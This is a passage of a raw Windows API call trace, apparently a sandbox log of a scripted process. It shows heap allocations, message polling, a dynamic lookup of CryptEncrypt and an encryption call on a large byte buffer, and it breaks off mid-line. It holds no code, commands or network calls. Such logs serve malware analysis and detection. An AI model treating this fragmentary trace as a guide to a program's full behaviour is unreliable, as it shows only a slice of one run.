[0242.796] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0242.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041f8 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0242.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0242.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0242.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513a0 [0242.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.799] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542d8 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0242.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0242.800] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13441, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13448) returned 1 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x9785b0 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0242.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f4e508 [0242.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9785b0 | out: hHeap=0x970000) returned 1 [0242.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0242.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0242.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0242.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0242.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0242.805] CharLowerBuffW (in: lpsz="byte[78920]", cchLength=0xb | out: lpsz="byte[78920]") returned 0xb [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0242.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13448) returned 0x2e7f320 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0242.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0242.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, 